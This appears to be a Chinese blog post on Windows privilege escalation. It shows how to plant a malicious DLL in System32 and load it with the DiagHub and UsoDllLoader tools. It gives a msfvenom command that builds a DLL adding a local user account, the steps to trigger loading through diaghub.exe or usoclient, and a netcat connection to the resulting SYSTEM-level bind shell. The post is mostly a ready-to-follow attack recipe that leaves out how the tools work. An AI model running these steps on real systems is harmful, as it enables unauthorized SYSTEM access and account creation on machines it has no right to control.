从System32中立即加载dll并执行

本文只关注怎么使用现有工具快速的从System32中加载恶意dll文件并执行,不关注工具原理

Diaghub#

基本信息#

版本限制:version < Win10 v1903

原理:

工具下载:Diaghub

使用方法#

  • 生成一个利用的dll文件
1
msfvenom -p windows/x64/exec CMD="net user test test /add" -f dll > ycdxsb.dll
  • 把dll文件放入到C:\Windows\System32路径下
  • 执行diaghub.exe C:\ProgramData dll文件名完成利用

diaghub

UsoDllLoader#

基本信息#

版本限制:version >= Win10 v1903,具体失效版本不确定

原理:

工具下载:UsoDllLoader

使用方法#

最优使用法#

  • WindowsCoreDeviceInfo.dll文件移动到C:\Windows\System32\路径下

UsoDllLoader

  • 命令行执行UsoDllLoader.exe,会自动加载C:\Windows\System32\WindowsCoreDeviceInfo.dll,并通过tcp bind的方法弹出shell,且权限为NT AUTOORITY\SYSTEM权限

非最优使用法#

issueREADME中提到,如果最优使用法失败,可以尝试使用第二种方法

  • 首先将WindowsCoreDeviceInfo.dll文件移动到C:\Windows\System32\路径下
  • 使用命令行usoclient StartInteractiveScan强行加载dll文件(这一步不会有输出,usoclient为系统自带工具)
  • 使用nc连接端口获得shell,nc.exe 127.0.0.1 1337

我想着这个问题1903上有,低版本上应该也有,然后在win10 v1709上复现的时候碰到了issue提到的问题,但是非最优使用法没有成功

评论